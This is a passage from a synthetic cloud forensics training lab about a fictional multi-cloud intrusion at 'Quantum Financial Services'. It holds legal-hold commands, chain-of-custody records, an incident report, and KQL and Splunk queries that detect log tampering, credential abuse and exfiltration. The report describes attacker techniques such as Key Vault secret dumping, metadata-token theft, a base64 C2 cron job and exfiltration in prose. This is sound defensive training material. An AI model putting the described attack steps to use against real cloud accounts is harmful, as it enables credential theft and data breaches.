--container-name "case-qfs-ir-2026-0042" \
--period 2555 \
--allow-protected-append-writes true
# 2. Lock forensic snapshots with resource locks
$ az lock create \
--name "LegalHold-QFS-IR-2026-0042" \
--resource-group rg-forensics \
--resource-name "forensic-snap-vm-compliance-01-os-20260324" \
--resource-type "Microsoft.Compute/snapshots" \
--lock-type CanNotDelete \
--notes "Legal hold for case QFS-IR-2026-0042. Do not remove without legal approval."
$ az lock create \
--name "LegalHold-QFS-IR-2026-0042" \
--resource-group rg-forensics \
--resource-name "forensic-snap-vm-compliance-01-data-20260324" \
--resource-type "Microsoft.Compute/snapshots" \
--lock-type CanNotDelete \
--notes "Legal hold for case QFS-IR-2026-0042. Do not remove without legal approval."
echo "[+] Legal holds applied to all evidence in AWS and Azure"
Step 5.3: Chain of Custody Master Record¶
# ============================================================
# Step 5.3: Consolidated Chain of Custody Document
# ============================================================
$ cat > ~/cloud-dfir-lab24/chain-of-custody/master-chain-of-custody.json << 'MASTER_COC_EOF'
{
"case_information": {
"case_id": "QFS-IR-2026-0042",
"case_title": "Quantum Financial Services Multi-Cloud Intrusion Investigation",
"classification": "CONFIDENTIAL",
"incident_date": "2026-03-24T14:28:00Z",
"detection_date": "2026-03-24T14:32:00Z",
"investigation_start": "2026-03-24T15:00:00Z",
"lead_investigator": "forensic-analyst@quantumfinancial.example.com",
"authorized_by": "ciso@quantumfinancial.example.com",
"legal_counsel": "legal@quantumfinancial.example.com",
"law_enforcement_case": "Pending referral"
},
"evidence_inventory": [
{
"evidence_id": "E001",
"description": "AWS CloudTrail Logs — us-east-1 — 2026-03-22 to 2026-03-25",
"type": "Cloud API Audit Logs",
"cloud": "AWS",
"source": "s3://qfs-cloudtrail-123456789012",
"file_count": 4287,
"size": "189 MB",
"hash_algorithm": "SHA-256",
"hash_manifest": "evidence_hashes_raw.sha256",
"integrity_validation": "72/72 digests valid, 4287/4287 files valid",
"acquisition_time": "2026-03-24T16:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + S3 Object Lock (COMPLIANCE mode)"
},
{
"evidence_id": "E002",
"description": "EBS Snapshot — Root volume of i-0a1b2c3d4e5f6789a (API Gateway)",
"type": "Disk Image",
"cloud": "AWS",
"source": "vol-0a1b2c3d4e5f0001",
"snapshot_id": "snap-0a1b2c3d4e5f0001",
"size": "50 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:30:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "AWS EBS Snapshot — tagged DoNotDelete, legal hold policy"
},
{
"evidence_id": "E003",
"description": "EBS Snapshot — Data volume of i-0a1b2c3d4e5f6789a",
"type": "Disk Image",
"cloud": "AWS",
"source": "vol-0a1b2c3d4e5f0002",
"snapshot_id": "snap-0a1b2c3d4e5f0002",
"size": "200 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:31:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "AWS EBS Snapshot — tagged DoNotDelete, legal hold policy"
},
{
"evidence_id": "E004",
"description": "Memory dump — i-0a1b2c3d4e5f6789a (LiME format via AVML)",
"type": "Volatile Memory",
"cloud": "AWS",
"source": "i-0a1b2c3d4e5f6789a (16 GB RAM)",
"size": "16 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T16:35:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com (via SSM Run Command)",
"storage": "Encrypted forensic workstation + S3 Object Lock"
},
{
"evidence_id": "E005",
"description": "Azure Activity Logs — 2026-03-22 to 2026-03-25",
"type": "Cloud Management Plane Logs",
"cloud": "Azure",
"source": "Azure Monitor — subscription 12345678-abcd-ef01-2345-678901234567",
"entry_count": 2341,
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + Azure immutable storage"
},
{
"evidence_id": "E006",
"description": "Azure VM OS Disk Snapshot — vm-compliance-01",
"type": "Disk Image",
"cloud": "Azure",
"snapshot_name": "forensic-snap-vm-compliance-01-os-20260324",
"size": "128 GB",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:00:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Azure Snapshot — resource lock CanNotDelete, legal hold"
},
{
"evidence_id": "E007",
"description": "Azure AD Sign-In and Audit Logs — 2026-03-22 to 2026-03-25",
"type": "Identity Audit Logs",
"cloud": "Azure",
"source": "Microsoft Graph API — auditLogs/signIns, auditLogs/directoryAudits",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:15:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation + Azure immutable storage"
},
{
"evidence_id": "E008",
"description": "VPC Flow Logs and NSG Flow Logs — incident window",
"type": "Network Flow Data",
"cloud": "AWS + Azure",
"source": "CloudWatch vpc-flow-logs-prod + Azure NSG Flow Logs",
"hash_algorithm": "SHA-256",
"acquisition_time": "2026-03-24T17:30:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"storage": "Encrypted forensic workstation"
}
],
"synthetic_notice": "THIS ENTIRE DOCUMENT IS 100% SYNTHETIC — CREATED FOR TRAINING PURPOSES ONLY"
}
MASTER_COC_EOF
echo "[+] Master chain of custody record created with 8 evidence items"
Step 5.4: Forensic Report¶
# FORENSIC INVESTIGATION REPORT
# Case: QFS-IR-2026-0042
# Classification: CONFIDENTIAL
# ALL DATA IS 100% SYNTHETIC — TRAINING EXERCISE ONLY
## Executive Summary
On March 24, 2026, Quantum Financial Services (fictional) detected a coordinated
multi-cloud intrusion affecting both AWS and Azure environments. The attacker
compromised the CI/CD service account `dev-jenkins-ci` (AWS) and exploited a
Managed Identity (`mi-compliance-scanner`) on an Azure compliance VM. Over
approximately 1.5 hours, the attacker:
1. **Reconnaissance**: Systematically enumerated AWS IAM, EC2, S3, and Secrets
Manager resources (14:28-14:34 UTC)
2. **Credential Access**: Retrieved secrets from AWS Secrets Manager and dumped
47 secrets from Azure Key Vault including database credentials, API keys,
and cross-cloud access keys (14:34-14:38 UTC)
3. **Persistence**: Created a new AWS IAM access key and added a client secret
to an Azure Service Principal (14:36, 14:52 UTC)
4. **Lateral Movement**: Used SSM Session Manager to access the API Gateway
EC2 instance, then pivoted to the database server (15:55-15:58 UTC)
5. **Data Exfiltration**: Exported 50,000 customer records from the production
database and downloaded ~150 MB from the S3 data lake. Data was exfiltrated
to 198.51.100.99 via HTTPS (15:58-16:15 UTC)
6. **Anti-Forensics**: Attempted to disable CloudTrail logging (15:47 UTC) —
this attempt was blocked by IAM policy restrictions
### Impact Assessment
| Category | Impact | Details |
|----------|--------|---------|
| Data Breach | **CRITICAL** | 50,000+ customer PII records, financial transaction data, SOX audit reports |
| Credential Exposure | **CRITICAL** | 47 Key Vault secrets, database credentials, API keys, JWT signing keys |
| Persistence | **HIGH** | Backdoor IAM access key (AWS), backdoor SP credential (Azure) |
| Resource Abuse | **MEDIUM** | Unauthorized EC2 instance launched (potential cryptomining) |
| Compliance | **CRITICAL** | GDPR, SOX, PCI DSS breach notification required |
### Immediate Containment Actions Taken
1. Disabled compromised IAM user `dev-jenkins-ci` and both access keys
2. Revoked Managed Identity token for `mi-compliance-scanner`
3. Removed attacker-added client secret from `sp-devops-pipeline`
4. Reverted S3 bucket policy on `qfs-datalake-prod-123456789012`
5. Terminated unauthorized EC2 instance
6. Removed malicious cron job from API Gateway instance
7. Rotated all 47 compromised Key Vault secrets
8. Blocked attacker IPs 203.0.113.42 and 198.51.100.99 at network perimeter
### Root Cause
The initial access vector was a compromised CI/CD service account (`dev-jenkins-ci`)
with excessive permissions and no MFA enforcement. The access key had not been
rotated in 9+ months. The cross-cloud pivot was enabled by storing AWS credentials
in Azure Key Vault without adequate access controls on the Managed Identity.
### Recommendations
1. Enforce MFA on all service accounts (AWS IAM, Azure Service Principals)
2. Implement 90-day key rotation policy for all service account credentials
3. Apply least-privilege IAM policies — remove S3 PutBucketPolicy from CI/CD
4. Enable IMDSv2 (token-required) on all EC2 instances to prevent SSRF-based theft
5. Restrict Managed Identity permissions to minimum required Key Vault secrets
6. Deploy cross-cloud SIEM correlation rules (AWS + Azure unified timeline)
7. Enable S3 Block Public Access at the account level
8. Implement network segmentation between compliance VMs and production secrets
**ALL DATA IN THIS REPORT IS 100% SYNTHETIC — CREATED FOR TRAINING PURPOSES ONLY**
Step 5.5: Anti-Forensics Detection Across Both Clouds¶
# ============================================================
# Step 5.5: Anti-Forensics Detection Checklist
# Comprehensive check for evidence tampering in both clouds
# ============================================================
// -----------------------------------------------------------------
// Detection: AWS CloudTrail Tampering (Cross-Cloud Sentinel Query)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteEventDataStore",
"StopEventDataStoreIngestion",
"DisableOrganizationAdminAccount",
"DeleteFlowLogs", "DeleteVpcFlowLogs"
)
| extend AttemptStatus = iff(ErrorCode == "", "SUCCESS", "BLOCKED")
| project TimeGenerated, EventName, UserIdentityUserName,
SourceIpAddress, AttemptStatus, ErrorCode, ErrorMessage
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Azure Diagnostic Settings Modification
// MITRE: T1562.008
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue in (
"Microsoft.Insights/diagnosticSettings/delete",
"Microsoft.Insights/diagnosticSettings/write",
"Microsoft.OperationalInsights/workspaces/delete",
"Microsoft.SecurityInsights/alertRules/delete"
)
| project TimeGenerated, Caller, CallerIpAddress,
OperationNameValue, ActivityStatusValue,
Resource = _ResourceId
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Evidence Deletion Attempts (Both Clouds)
// MITRE: T1070.004 — Indicator Removal: File Deletion
// -----------------------------------------------------------------
// AWS — S3 object deletion
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in ("DeleteObject", "DeleteObjects", "DeleteBucket")
| where RequestParameters contains "cloudtrail" or
RequestParameters contains "flowlog" or
RequestParameters contains "forensic"
| project TimeGenerated, EventName, UserIdentityUserName,
SourceIpAddress, RequestParameters
// Azure — Resource deletion
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue contains "delete"
| where ResourceProviderValue in (
"Microsoft.Compute", // VM/disk/snapshot deletion
"Microsoft.Storage", // Storage deletion
"Microsoft.KeyVault", // Key Vault deletion
"Microsoft.OperationalInsights" // Log Analytics deletion
)
| where ActivityStatusValue == "Success"
| project TimeGenerated, Caller, CallerIpAddress,
OperationNameValue, Resource = _ResourceId
// -----------------------------------------------------------------
// Detection: AWS CloudTrail Tampering
// MITRE: T1562.008
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteEventDataStore" OR
eventName="StopEventDataStoreIngestion" OR
eventName="DeleteFlowLogs")
earliest=-7d
| eval AttemptStatus=if(isnull(errorCode) OR errorCode="", "SUCCESS", "BLOCKED")
| table _time, eventName, userIdentity.userName, sourceIPAddress,
AttemptStatus, errorCode, errorMessage
// -----------------------------------------------------------------
// Detection: Azure Diagnostic Settings Modification
// MITRE: T1562.008
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.Insights/diagnosticSettings/delete" OR
operationName.value="Microsoft.Insights/diagnosticSettings/write" OR
operationName.value="Microsoft.OperationalInsights/workspaces/delete" OR
operationName.value="Microsoft.SecurityInsights/alertRules/delete")
earliest=-7d
| table _time, Caller, CallerIpAddress, operationName.value,
status.value, ResourceId
// -----------------------------------------------------------------
// Detection: Evidence Deletion Attempts (Both Clouds)
// MITRE: T1070.004
// -----------------------------------------------------------------
// AWS
index=aws sourcetype="aws:cloudtrail"
(eventName="DeleteObject" OR eventName="DeleteObjects" OR
eventName="DeleteBucket")
(requestParameters="*cloudtrail*" OR requestParameters="*flowlog*" OR
requestParameters="*forensic*")
earliest=-7d
| table _time, eventName, userIdentity.userName, sourceIPAddress,
requestParameters
// Azure
index=azure sourcetype="azure:monitor:activity"
operationName.value="*delete*"
(ResourceProviderValue="Microsoft.Compute" OR
ResourceProviderValue="Microsoft.Storage" OR
ResourceProviderValue="Microsoft.KeyVault" OR
ResourceProviderValue="Microsoft.OperationalInsights")
status.value="Succeeded"
earliest=-7d
| table _time, Caller, CallerIpAddress, operationName.value, ResourceId
# Anti-Forensics Detection Summary for Case QFS-IR-2026-0042 (SYNTHETIC)
# AWS Anti-Forensics Attempts Detected:
# [BLOCKED] 2026-03-24T15:47:22Z — StopLogging (CloudTrail) by dev-jenkins-ci
# [BLOCKED] 2026-03-24T15:48:05Z — DeleteTrail (CloudTrail) by dev-jenkins-ci
# [PARTIAL] Malicious cron job used base64 encoding to hide C2 callback
# [PARTIAL] Staging directory used dotfile naming (.staging) for concealment
# Azure Anti-Forensics Attempts Detected:
# [NONE] No diagnostic settings modifications detected
# [NONE] No log deletion attempts detected
# [PARTIAL] Attacker used dotfile naming for cached tokens (.az_token_cache)
echo "[+] Anti-forensics detection scan complete"
echo "[+] 2 blocked AWS CloudTrail tampering attempts detected"
echo "[+] 0 Azure log tampering attempts detected"
echo "[+] Multiple concealment techniques identified (base64, dotfiles)"
Step 5.6: Evidence Preservation for Law Enforcement¶
# ============================================================
# Step 5.6: Prepare Evidence Package for Law Enforcement
# ============================================================
# Create evidence package manifest
$ cat > ~/cloud-dfir-lab24/reports/evidence-package-manifest.txt << 'MANIFEST_EOF'
============================================================
EVIDENCE PACKAGE MANIFEST
Case: QFS-IR-2026-0042
Prepared for: Law Enforcement Referral
Classification: CONFIDENTIAL
Date: 2026-03-25
============================================================
THIS IS A 100% SYNTHETIC TRAINING DOCUMENT
EVIDENCE ITEMS:
===============
E001 — AWS CloudTrail Logs
Files: 4,287 compressed JSON files
Size: 189 MB
Period: 2026-03-22 to 2026-03-25
Integrity: SHA-256 manifest (evidence_hashes_raw.sha256)
CloudTrail digest validation: 72/72 PASS
E002 — AWS EBS Snapshot (Root Volume)
Snapshot ID: snap-0a1b2c3d4e5f0001
Source: vol-0a1b2c3d4e5f0001 (i-0a1b2c3d4e5f6789a)
Size: 50 GB
Integrity: SHA-256 hash on file
E003 — AWS EBS Snapshot (Data Volume)
Snapshot ID: snap-0a1b2c3d4e5f0002
Source: vol-0a1b2c3d4e5f0002 (i-0a1b2c3d4e5f6789a)
Size: 200 GB
Integrity: SHA-256 hash on file
E004 — Memory Dump (API Gateway Instance)
Format: LiME (Linux Memory Extractor)
Size: 16 GB (compressed: 5.2 GB)
Source: i-0a1b2c3d4e5f6789a (16 GB RAM)
Acquisition tool: AVML v0.14.0 via SSM Run Command
Integrity: SHA-256 hash on file
E005 — Azure Activity Logs
Entries: 2,341
Period: 2026-03-22 to 2026-03-25
Source: Azure Monitor
Integrity: SHA-256 hash on file
E006 — Azure VM OS Disk Snapshot
Snapshot: forensic-snap-vm-compliance-01-os-20260324
Size: 128 GB (VHD format)
Source: vm-compliance-01
Integrity: SHA-256 hash on file
E007 — Azure AD Sign-In and Audit Logs
Source: Microsoft Graph API
Period: 2026-03-22 to 2026-03-25
Integrity: SHA-256 hash on file
E008 — Network Flow Logs (AWS VPC + Azure NSG)
Source: CloudWatch + Azure Storage
Period: 2026-03-24
Integrity: SHA-256 hash on file
ANALYSIS PRODUCTS:
==================
A001 — Unified cross-cloud timeline (JSON + CSV)
A002 — Attacker API call timeline (AWS, 235 events)
A003 — Memory analysis report (Volatility3 output)
A004 — Disk forensics report (plaso/log2timeline output)
A005 — Network flow analysis summary
A006 — Key Vault access audit (47 secrets enumerated)
A007 — S3 data exfiltration summary (5 files, ~220 MB)
CHAIN OF CUSTODY:
=================
All evidence items include individual chain of custody records.
Master chain of custody: master-chain-of-custody.json
Legal hold applied: AWS S3 Object Lock (COMPLIANCE) + Azure Resource Locks
TOOLS USED:
===========
AWS CLI 2.15.30, Azure CLI 2.58.0, Volatility 3 2.5.2,
AVML 0.14.0, Sleuthkit 4.12.1, plaso 20240301, jq 1.7,
Python 3.11
THIS IS A 100% SYNTHETIC TRAINING DOCUMENT
============================================================
MANIFEST_EOF
echo "[+] Evidence package manifest created"
echo "[+] Ready for law enforcement handoff (SYNTHETIC)"
Consolidated Detection Queries¶
This section consolidates the most critical detection queries from all five exercises.
Multi-Cloud Threat Detection Dashboard¶
// =================================================================
// MASTER DETECTION: Cross-Cloud Compromised Credential Activity
// Case: QFS-IR-2026-0042 | Covers AWS + Azure
// =================================================================
// --- Panel 1: AWS Credential Abuse ---
let AWSCredentialAbuse = AWSCloudTrail
| where TimeGenerated > ago(24h)
| where SourceIpAddress !in ("10.100.2.50", "10.50.1.10")
| where EventName in (
"GetCallerIdentity", "CreateAccessKey", "AssumeRole",
"GetSecretValue", "PutBucketPolicy", "RunInstances",
"StopLogging", "DeleteTrail"
)
| summarize
EventCount = count(),
APIs = make_set(EventName),
UniqueAPIs = dcount(EventName)
by UserIdentityUserName, SourceIpAddress, bin(TimeGenerated, 1h)
| where UniqueAPIs >= 3
| extend Cloud = "AWS";
// --- Panel 2: Azure Identity Abuse ---
let AzureIdentityAbuse = union
(AzureActivity
| where TimeGenerated > ago(24h)
| where OperationNameValue in (
"Microsoft.KeyVault/vaults/secrets/read",
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Authorization/roleAssignments/write"
)
| summarize
EventCount = count(),
APIs = make_set(OperationNameValue),
UniqueAPIs = dcount(OperationNameValue)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| where UniqueAPIs >= 2
| extend Cloud = "Azure"),
(AuditLogs
| where TimeGenerated > ago(24h)
| where OperationName in (
"Add service principal credentials",
"Add member to role",
"Consent to application"
)
| extend Caller = tostring(InitiatedBy.app.displayName)
| extend CallerIpAddress = tostring(InitiatedBy.app.ipAddress)
| summarize
EventCount = count(),
APIs = make_set(OperationName),
UniqueAPIs = dcount(OperationName)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| extend Cloud = "Azure");
// --- Combined View ---
union AWSCredentialAbuse, AzureIdentityAbuse
| project TimeGenerated, Cloud, Caller = coalesce(UserIdentityUserName, Caller),
SourceIP = coalesce(SourceIpAddress, CallerIpAddress),
EventCount, UniqueAPIs, APIs
| order by TimeGenerated asc
// =================================================================
// MASTER DETECTION: Cross-Cloud Data Exfiltration
// =================================================================
let AWSExfil = AWSVPCFlow
| where TimeGenerated > ago(24h)
| where FlowDirection == "O"
| where DstAddr !startswith "10." and DstAddr !startswith "172."
and DstAddr !startswith "192.168."
| summarize TotalBytes = sum(Bytes) by SrcAddr, DstAddr,
bin(TimeGenerated, 15m)
| where TotalBytes > 10000000
| extend Cloud = "AWS", TotalMB = round(TotalBytes / 1048576.0, 1);
let AzureExfil = AzureNetworkAnalytics_CL
| where TimeGenerated > ago(24h)
| where FlowDirection_s == "O"
| where DestIP_s !startswith "10." and DestIP_s !startswith "172."
and DestIP_s !startswith "192.168."
| summarize TotalBytes = sum(toint(BytesSent_d))
by SrcIP_s, DestIP_s, bin(TimeGenerated, 15m)
| where TotalBytes > 10000000
| extend Cloud = "Azure", TotalMB = round(TotalBytes / 1048576.0, 1),
SrcAddr = SrcIP_s, DstAddr = DestIP_s;
union AWSExfil, AzureExfil
| project TimeGenerated, Cloud, SrcAddr, DstAddr, TotalMB
| order by TotalMB desc
// =================================================================
// MASTER DETECTION: Cross-Cloud Anti-Forensics
// =================================================================
let AWSAntiForensics = AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteFlowLogs"
)
| extend Cloud = "AWS",
AttemptStatus = iff(ErrorCode == "", "SUCCESS", "BLOCKED"),
Actor = UserIdentityUserName,
SourceIP = SourceIpAddress,
Action = EventName;
let AzureAntiForensics = AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue in (
"Microsoft.Insights/diagnosticSettings/delete",
"Microsoft.OperationalInsights/workspaces/delete",
"Microsoft.SecurityInsights/alertRules/delete"
)
| extend Cloud = "Azure",
AttemptStatus = ActivityStatusValue,
Actor = Caller,
SourceIP = CallerIpAddress,
Action = OperationNameValue;
union AWSAntiForensics, AzureAntiForensics
| project TimeGenerated, Cloud, Actor, SourceIP, Action, AttemptStatus
| order by TimeGenerated asc
// =================================================================
// MASTER DETECTION: Cross-Cloud Compromised Credential Activity
// =================================================================
// --- AWS Credential Abuse ---
index=aws sourcetype="aws:cloudtrail"
(eventName="GetCallerIdentity" OR eventName="CreateAccessKey" OR
eventName="AssumeRole" OR eventName="GetSecretValue" OR
eventName="PutBucketPolicy" OR eventName="RunInstances" OR
eventName="StopLogging" OR eventName="DeleteTrail")
NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
earliest=-24h
| stats
count as EventCount,
values(eventName) as APIs,
dc(eventName) as UniqueAPIs
by userIdentity.userName, sourceIPAddress, span=1h
| where UniqueAPIs >= 3
| eval Cloud="AWS"
| rename userIdentity.userName as Caller, sourceIPAddress as SourceIP
| append [
// --- Azure Identity Abuse ---
search index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.KeyVault/vaults/secrets/read" OR
operationName.value="Microsoft.Storage/storageAccounts/listKeys/action" OR
operationName.value="Microsoft.Authorization/roleAssignments/write")
earliest=-24h
| stats
count as EventCount,
values(operationName.value) as APIs,
dc(operationName.value) as UniqueAPIs
by Caller, CallerIpAddress, span=1h
| where UniqueAPIs >= 2
| eval Cloud="Azure"
| rename CallerIpAddress as SourceIP
]
| table _time, Cloud, Caller, SourceIP, EventCount, UniqueAPIs, APIs
| sort _time
// =================================================================
// MASTER DETECTION: Cross-Cloud Data Exfiltration
// =================================================================
index=aws sourcetype="aws:cloudwatchlogs:vpcflow" action=ACCEPT
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", dest_ip) OR
cidrmatch("172.16.0.0/12", dest_ip) OR
cidrmatch("192.168.0.0/16", dest_ip))
| stats sum(bytes) as TotalBytes by src_ip, dest_ip, span=15m
| where TotalBytes > 10000000
| eval Cloud="AWS", TotalMB=round(TotalBytes/1048576, 1)
| rename src_ip as SrcAddr, dest_ip as DstAddr
| append [
search index=azure sourcetype="azure:nsg:flowlogs"
FlowDirection="O"
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", DestIP) OR
cidrmatch("172.16.0.0/12", DestIP) OR
cidrmatch("192.168.0.0/16", DestIP))
| stats sum(BytesSent) as TotalBytes by SrcIP, DestIP, span=15m
| where TotalBytes > 10000000
| eval Cloud="Azure", TotalMB=round(TotalBytes/1048576, 1)
| rename SrcIP as SrcAddr, DestIP as DstAddr
]
| table _time, Cloud, SrcAddr, DstAddr, TotalMB
| sort -TotalMB
// =================================================================
// MASTER DETECTION: Cross-Cloud Anti-Forensics
// =================================================================
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteFlowLogs")
earliest=-7d
| eval Cloud="AWS",
AttemptStatus=if(isnull(errorCode) OR errorCode="", "SUCCESS", "BLOCKED"),
Actor=mvindex(split(spath(_raw,"userIdentity.userName"), ","), 0),
SourceIP=sourceIPAddress,
Action=eventName
| append [
search index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.Insights/diagnosticSettings/delete" OR
operationName.value="Microsoft.OperationalInsights/workspaces/delete" OR
operationName.value="Microsoft.SecurityInsights/alertRules/delete")
earliest=-7d
| eval Cloud="Azure", AttemptStatus=status.value,
Actor=Caller, SourceIP=CallerIpAddress,
Action=spath(_raw, "operationName.value")
]
| table _time, Cloud, Actor, SourceIP, Action, AttemptStatus
| sort _time
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Exercise | Detection Method |
|---|---|---|---|
| T1078.004 | Valid Accounts: Cloud Accounts | Ex. 1, 3 | CloudTrail/Activity Log source IP anomaly |
| T1087.004 | Account Discovery: Cloud Account | Ex. 1 | IAM enumeration API burst detection |
| T1580 | Cloud Infrastructure Discovery | Ex. 1 | EC2/VPC describe API burst detection |
| T1530 | Data from Cloud Storage | Ex. 1, 2 | S3 GetObject volume anomaly |
| T1562.008 | Impair Defenses: Disable Cloud Logs | Ex. 1, 5 | CloudTrail StopLogging/DeleteTrail |
| T1098.001 | Account Manipulation: Additional Cloud Credentials | Ex. 1, 3 | CreateAccessKey, Add SP credentials |
| T1552.005 | Unsecured Credentials: Cloud Instance Metadata | Ex. 2, 4 | IMDS token request detection |
| T1552.001 | Unsecured Credentials: Credentials in Files | Ex. 3, 4 | Key Vault mass secret read |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | Ex. 2 | SSM session + bash reverse shell |
| T1005 | Data from Local System | Ex. 2, 4 | Database export via psql |
| T1048 | Exfiltration Over Alternative Protocol | Ex. 2 | VPC Flow large outbound transfer |
| T1071.001 | Application Layer Protocol: Web Protocols | Ex. 2 | HTTPS exfiltration to external IP |
| T1570 | Lateral Tool Transfer | Ex. 2 | SSM Session Manager to EC2 |
| T1550.001 | Use Alternate Authentication Material | Ex. 3 | Managed Identity token abuse |
| T1528 | Steal Application Access Token | Ex. 3, 4 | IMDS OAuth token theft |
| T1556.006 | Modify Authentication Process: MFA | Ex. 3 | Service Principal credential addition |
| T1098.003 | Account Manipulation: Additional Cloud Roles | Ex. 3 | Role assignment attempt |
| T1046 | Network Service Discovery | Ex. 4 | NSG Flow Log unusual port scanning |
| T1613 | Container and Resource Discovery | Ex. 4 | AKS secrets listing, pod exec |
| T1609 | Container Administration Command | Ex. 4 | kubectl exec from non-AKS IP |
| T1070.004 | Indicator Removal: File Deletion | Ex. 5 | S3/Azure resource deletion attempts |
Security Controls Implemented¶
| Category | Before Investigation | After Investigation |
|---|---|---|
| CloudTrail Logging | Enabled, single trail | Validated, log integrity confirmed |
| IAM Key Rotation | No policy (9+ month keys) | 90-day mandatory rotation |
| Service Account MFA | Not enforced | Required for all service accounts |
| S3 Public Access | Per-bucket policy | Account-level Block Public Access |
| EC2 IMDS | v1 (no token required) | v2 enforced (token required) |
| Managed Identity Scope | Broad Key Vault access | Least-privilege secret access |
| Azure Diagnostic Settings | Partial coverage | Full coverage + immutable storage |
| Cross-Cloud Monitoring | Siloed cloud monitoring | Unified Sentinel with AWS connector |
| Legal Hold Procedures | None documented | Automated with S3 Object Lock + Resource Locks |
| IR Playbook | Single-cloud only | Cross-cloud DFIR playbook with timeline merger |
Lab Summary¶
Key Takeaways¶
-
Cloud forensics requires different tools but the same principles -- chain of custody, evidence integrity, and timeline analysis apply equally to cloud environments as they do to traditional on-premises investigations
-
Log integrity validation is critical -- always verify CloudTrail digest files and Azure diagnostic settings before relying on log data for forensic conclusions
-
Memory acquisition in the cloud is time-sensitive -- use SSM Run Command (AWS) or VM extensions (Azure) with AVML/LiME to capture volatile evidence before instance termination or reboot
-
Cross-cloud attacks exploit credential sharing -- storing cloud credentials (AWS keys in Azure Key Vault, Azure secrets in AWS Secrets Manager) creates pivot paths that attackers actively exploit
-
Anti-forensics detection should be your first analysis step -- check for CloudTrail StopLogging, diagnostic settings deletion, and log tampering before trusting any log source
-
Unified timelines reveal attack patterns -- correlating AWS CloudTrail and Azure Activity Logs on the same timeline exposed the simultaneous multi-cloud nature of this attack that single-cloud analysis would have missed
-
Legal hold automation prevents evidence loss -- S3 Object Lock (COMPLIANCE mode) and Azure Resource Locks with immutable storage ensure evidence survives even if an attacker or careless administrator attempts deletion
-
IMDS credential theft is a top cloud threat -- both AWS and Azure Instance Metadata Services provide easy credential access from compromised VMs; enforce IMDSv2 and restrict Managed Identity scopes
Additional Resources¶
Cross-References¶
- Chapter 20: Cloud Attack & Defense -- cloud security architecture, shared responsibility model, and cloud-native attack techniques
- Chapter 27: Digital Forensics -- forensic methodology, evidence handling, chain of custody, and timeline analysis
- Chapter 28: Advanced Incident Response -- IR lifecycle, containment strategies, and cross-functional coordination
- Chapter 9: Incident Response Lifecycle -- NIST IR framework, preparation, detection, containment, eradication, recovery
- Chapter 46: Cloud & Container Red Teaming -- offensive cloud techniques for understanding attacker TTPs
- Chapter 2: Telemetry & Logging -- log source configuration, CloudTrail, Azure Monitor, log integrity
- Scenario SC-052: Cloud Cryptojacking -- cloud resource abuse detection and response
- Purple Team Exercise Library -- purple team exercises for validating cloud detection capabilities
External Resources¶
- AWS CloudTrail Documentation -- CloudTrail configuration, log format, and integrity validation
- Azure Monitor Documentation -- Azure logging, diagnostics, and Log Analytics
- Microsoft Sentinel Documentation -- SIEM, hunting queries, and analytics rules
- AVML (Acquire Volatile Memory for Linux) -- Microsoft open-source memory acquisition tool
- Volatility 3 Documentation -- memory forensics analysis framework
- AWS Security Incident Response Guide -- AWS official IR guidance
- NIST SP 800-86: Guide to Integrating Forensic Techniques -- forensic methodology standards
- Cloud Forensics Reference Architecture -- CSA cloud forensics guidance
- MITRE ATT&CK Cloud Matrix -- cloud-specific adversary techniques
CWE References¶
| CWE | Name | Exercise |
|---|---|---|
| CWE-522 | Insufficiently Protected Credentials | Ex. 1, 3 (access key without MFA, key rotation) |
| CWE-284 | Improper Access Control | Ex. 1, 3 (overprivileged service accounts) |
| CWE-732 | Incorrect Permission Assignment for Critical Resource | Ex. 1 (S3 bucket policy made public) |
| CWE-312 | Cleartext Storage of Sensitive Information | Ex. 2 (credentials in .env file) |
